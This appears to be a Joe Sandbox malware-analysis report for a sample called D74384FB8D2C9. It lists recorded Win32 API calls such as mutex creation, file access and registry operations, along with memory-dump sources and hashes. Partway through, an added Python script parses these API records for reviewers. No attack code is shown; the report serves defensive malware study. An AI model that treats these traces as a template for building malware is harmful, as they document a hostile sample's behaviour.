                                                                                  • Opcode ID: ae4f7b2a9547747d926e787e0f5ec29c5dc36fb97292b7a962b9e569fd761d1d
                                                                                  • Instruction ID: da3630ea290bbe5f5dae37cc8353403de89be0ff0c362d8cd92a357bcde89ef3
                                                                                  • Opcode Fuzzy Hash: ae4f7b2a9547747d926e787e0f5ec29c5dc36fb97292b7a962b9e569fd761d1d
                                                                                  • Instruction Fuzzy Hash: 2201D670600505AFFF01AF60C811A6E7EA1EF08794F00412AF955D62A1C739CD21DBD9
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(?,00000000,00000000,0000012C,00000000,00000030,?,00000000,00000000,00000000,0000012C,00000000,?,?,00000000,0049BB08), ref: 0044445A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: b5f5cde03e016b662fc24c73a18a69d9234e0de4a8c0f236b1194090e71ae53d
                                                                                  • Instruction ID: 1d4048e1da173febf0bcde2320521ae9eabc62b640d9a17010c5c759bcdce4ae
                                                                                  • Opcode Fuzzy Hash: b5f5cde03e016b662fc24c73a18a69d9234e0de4a8c0f236b1194090e71ae53d
                                                                                  • Instruction Fuzzy Hash: 68010472800209AFCF02AFE1CC41ADD7B71BF08308F00452AFA1465161D33A8961EF54
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: e86df0275a8205feb0fa5669bac49e50ffb4dc1926f038848e10fbbff8ab3abd
                                                                                  • Instruction ID: d35331273f47bde7be00cbf73eb8def9129e6338d40ebf5980943c8287a7d82b
                                                                                  • Opcode Fuzzy Hash: e86df0275a8205feb0fa5669bac49e50ffb4dc1926f038848e10fbbff8ab3abd
                                                                                  • Instruction Fuzzy Hash: EDF049B28300549BCF58DA78E8D9A677394B70434C705115AE40BAB144E7377858C66C
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,00000003,00000080,00000000), ref: 0BE9B96E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 3a0e6681f40175f073f5f587384fb30a9bef5413271f8c37f783cc750ae45834
                                                                                  • Instruction ID: 485f68c410f51f5a4a30e1248d80dea6208546b9d94d3c0e2172d9fd3ee1e84b
                                                                                  • Opcode Fuzzy Hash: 3a0e6681f40175f073f5f587384fb30a9bef5413271f8c37f783cc750ae45834
                                                                                  • Instruction Fuzzy Hash: E3E09BA27B055466FA70556DBCC3B4F518EC7C57A9F190131F154D72C0C158DD0652A4
                                                                                  APIs
                                                                                  • KiUserExceptionDispatcher.NTDLL(?,00000004,00454EA8,?,004447CB,00000004,00454EA8,004441B8,00442D0F,?,004447CB), ref: 0046C220
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DispatcherExceptionUser
                                                                                  • String ID:
                                                                                  • API String ID: 6842923-0
                                                                                  • Opcode ID: 1e1f35d4d0ece4bf11a585a596c5928c7898e7cd87d6e0dd72853d353c81396e
                                                                                  • Instruction ID: a62b274bb2aa07348c08e7cf078303fba1acd1a656781a79e9c90b42a4e36b8b
                                                                                  • Opcode Fuzzy Hash: 1e1f35d4d0ece4bf11a585a596c5928c7898e7cd87d6e0dd72853d353c81396e
                                                                                  • Instruction Fuzzy Hash: ACF03A72C00208AACF11DAD9D844EEFBBB8BB49354F048066F958A7151D7789905DBA0
                                                                                  APIs
                                                                                  • RegDeleteValueA.KERNEL32(?,?,?), ref: 0040A5BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 1108222502-0
                                                                                  • Opcode ID: dbb3f01ee544738ce28dd03af4cd20a1d1c51356b5744b3321e8d5c8fd3f173d
                                                                                  • Instruction ID: 1a88052cc606e39f0091078a90d60d827f50896834bc53fe7b9f33611c24bd45
                                                                                  • Opcode Fuzzy Hash: dbb3f01ee544738ce28dd03af4cd20a1d1c51356b5744b3321e8d5c8fd3f173d
                                                                                  • Instruction Fuzzy Hash: D3F03AB1900218AACF14DBE0C852BFEB378EB48300F404259BA06BB281DB795945CB61
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(?,?), ref: 0040A87B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 8f385544bad1f22c242810019e6a2bb94703e8f8522350f15491bc20473a14ec
                                                                                  • Instruction ID: 628f85e27ec20345891e79a20fd443186060a202b1d6c9cf28f58ee88d62c12c
                                                                                  • Opcode Fuzzy Hash: 8f385544bad1f22c242810019e6a2bb94703e8f8522350f15491bc20473a14ec
                                                                                  • Instruction Fuzzy Hash: 71F05EB1C0511CEACF1ADFA8C842AEDB7B8AF89314F1446CEA115AB291CB785F44CB51
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040BC18
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 501242067-0
                                                                                  • Opcode ID: 89f787f418b28ca22ed136954b72ca9b6b16358106742e5ea65c87c3e26667ec
                                                                                  • Instruction ID: fb13b940fff762313b909319a9df45b7b6b25380c2a7943f57b7f1fbf1f360ec
                                                                                  • Opcode Fuzzy Hash: 89f787f418b28ca22ed136954b72ca9b6b16358106742e5ea65c87c3e26667ec
                                                                                  • Instruction Fuzzy Hash: 93F0F8F4A001059BDB00DF94D882E5AB7A5EF9D304F1001A8F808D7341E635E8618BA6
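                                                                                  The "APIs" field of each record above is what a reviewer actually works from, and it is slow to read by hand: the arguments are raw stack slots, "Part of subcall function" lines belong to a callee rather than to the function itself, and constants such as 00000030 in SendMessageA or 00000003 and 00000080 in CreateFileA have to be looked up. The Python below is an added example, not Joe Sandbox code: it parses those lines exactly as they are rendered on this page, separates direct calls from subcall lines, pulls out resolved string literals such as ".mtx", and decodes the handful of Win32 constants that appear in these records. The sample input is copied from the records above. The DECODERS table is an assumption about which stack slot corresponds to which declared parameter; the report prints more slots than the API takes (CreateMutexA has three parameters but sixteen values are shown), so only the leading slots are decoded.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and decode the
Win32 constants a reviewer would otherwise look up by hand.

Added example; this is not Joe Sandbox code.  It relies only on the line
layout visible in the report: an optional bullet, an optional
'Part of subcall function <addr>:' prefix, '<api>.<module>', an optional
'(arg,arg,...)' list and a trailing 'ref: <addr>'.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field

LINE_RE = re.compile(
    r"^\s*(?:\u2022\s*)?"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")

# Assumed mapping (0-based declared-parameter position -> symbolic names).
# Only leading slots are real parameters; the report prints extra stack slots.
DECODERS = {
    ("SendMessageA", 1): {0x30: "WM_SETFONT"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("CreateFileA", 5): {0x80: "FILE_ATTRIBUTE_NORMAL"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                 # address of the call instruction ("ref:")
    args: list               # stack slots exactly as printed ("?" = unresolved)
    caller: int | None       # set for 'Part of subcall function' lines
    decoded: dict = field(default_factory=dict)  # slot index -> symbolic name

    @property
    def strings(self) -> list[str]:
        """Slots that are neither '?' nor an 8-digit immediate, i.e. string
        literals the plugin resolved (e.g. '.mtx' in the CreateMutexA record)."""
        return [a for a in self.args if a != "?" and not HEX_RE.fullmatch(a)]


def parse_line(line: str) -> ApiCall | None:
    m = LINE_RE.match(line)
    if not m:
        return None  # 'Memory Dump Source', fuzzy hashes etc. are not API lines
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    call = ApiCall(
        api=m["api"], module=m["module"], ref=int(m["ref"], 16), args=args,
        caller=int(m["caller"], 16) if m["caller"] else None,
    )
    for i, tok in enumerate(args):
        table = DECODERS.get((call.api, i))
        if table and HEX_RE.fullmatch(tok):
            name = table.get(int(tok, 16))
            if name:
                call.decoded[i] = name
    return call


def parse_record(text: str) -> list[ApiCall]:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def histogram(calls: list[ApiCall]) -> Counter:
    """Count 'MODULE!api' across records; useful across a whole report."""
    return Counter(f"{c.module}!{c.api}" for c in calls)


# Lines copied from the records above, with the bullets as rendered on this page.
SAMPLE = """\
• SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 004233BA
• __EH_prolog3.LIBCMT ref: 0044B139
  • Part of subcall function 004428ED: _malloc.LIBCMT ref: 0044290B
  • Part of subcall function 0044A97C: SetThreadPriority.KERNEL32(00000000,?,00000000,?,0044B190,?,?,?,?,00000004,00409C74,Function_00008B20,00000000,00000000,00000000,00000000), ref: 0044A988
• CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
• CreateFileA.KERNEL32(00000000,?,?,00000000,00000003,00000080,00000000), ref: 0BE9B96E
• _malloc.LIBCMT ref: 0040BC18
  • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
"""

if __name__ == "__main__":
    calls = parse_record(SAMPLE)
    for c in calls:
        via = f" (via {c.caller:08X})" if c.caller is not None else ""
        print(f"{c.ref:08X} {c.module}!{c.api}{via} decoded={c.decoded} strings={c.strings}")
    print(histogram(calls))
```

Running it over the sample turns the CreateFileA record into OPEN_EXISTING / FILE_ATTRIBUTE_NORMAL, the SendMessageA records into WM_SETFONT, and lists ".mtx", "xxxxxx" and "Index" as the string slots around the CreateMutexA call; the histogram is the piece to run over every record of a report rather than one.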
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: c0ae6ffc98b35ec06533d1097e51c2f42ef2c94053b7616d61686651cbc72185
                                                                                  • Instruction ID: ce52457c2ae1272404f2a1333cdf52adf358f598e8fe6d2d9cfb11dbb62cbad3
                                                                                  • Opcode Fuzzy Hash: c0ae6ffc98b35ec06533d1097e51c2f42ef2c94053b7616d61686651cbc72185
                                                                                  • Instruction Fuzzy Hash: 22E0757691521CBF9B40DE9CD881DDEB7FCEB49220F204156E958E3341E631AF449754
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: 3bd37185224070c0a61539273fb12927da37de63e12af93e3756d96671efd6ee
                                                                                  • Instruction ID: 50872d62b6857fc56e477281a54de4d190155a07deca4b8f2b9f0abd5902d540
                                                                                  • Opcode Fuzzy Hash: 3bd37185224070c0a61539273fb12927da37de63e12af93e3756d96671efd6ee
                                                                                  • Instruction Fuzzy Hash: 6BE06DB2500615ABD7008F8EC448A86F7EDDFA13B4B168827DA08CB162CBB1E445CBA4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: dbaf331f59ea131676a917ef7a8060d25baa83fd91427be639776e23a8254f4d
                                                                                  • Instruction ID: 7041beece4675cdc5c33c85ad889d1c1d18ee0184848fd224e8303d462654197
                                                                                  • Opcode Fuzzy Hash: dbaf331f59ea131676a917ef7a8060d25baa83fd91427be639776e23a8254f4d
                                                                                  • Instruction Fuzzy Hash: C3E06D335006155BD7008B5AC404B97F7ECEFA1375F26882BE408CB292CAB5E8058BA4
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(0BE90000,?,00000105), ref: 0BE9618E
                                                                                    • Part of subcall function 0BE96404: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0BEF80AC), ref: 0BE9641F
                                                                                    • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9643D
                                                                                    • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9645B
                                                                                    • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0BE96479
                                                                                    • Part of subcall function 0BE96404: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0BE964C2
                                                                                    • Part of subcall function 0BE96404: RegQueryValueExA.ADVAPI32(?,0BE96684,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001), ref: 0BE964E0
                                                                                    • Part of subcall function 0BE96404: RegCloseKey.ADVAPI32(?,0BE9650F,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0BE96502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                  • String ID:
                                                                                  • API String ID: 2796650324-0
                                                                                  • Opcode ID: 625707c7a7bcf0b33a4968531f11949b8533d4f282da037fcc6bb0f6f5a33390
                                                                                  • Instruction ID: 050e1f5cc23d727e6692746a4625dbcfd3882170046ab968909ccdb382bf673b
                                                                                  • Opcode Fuzzy Hash: 625707c7a7bcf0b33a4968531f11949b8533d4f282da037fcc6bb0f6f5a33390
                                                                                  • Instruction Fuzzy Hash: 32E0EDB1A002149FDF10DE98D8C1A5637D8AF08754F045952ED58DF246D371D96487D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 074d63ba527334af15d46b63d9e15d79b1e7f1b687124120124fde1b1d0d35bf
                                                                                  • Instruction ID: ec75aed6f9a275a19f285525e4af3adb1b91d2b60e0dc8bb7ca4e5d9d0970fad
                                                                                  • Opcode Fuzzy Hash: 074d63ba527334af15d46b63d9e15d79b1e7f1b687124120124fde1b1d0d35bf
                                                                                  • Instruction Fuzzy Hash: 95E0DF3220E606BBCB208EA888005C63BE8AB57334B24432AE070C72D0DB3098819B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
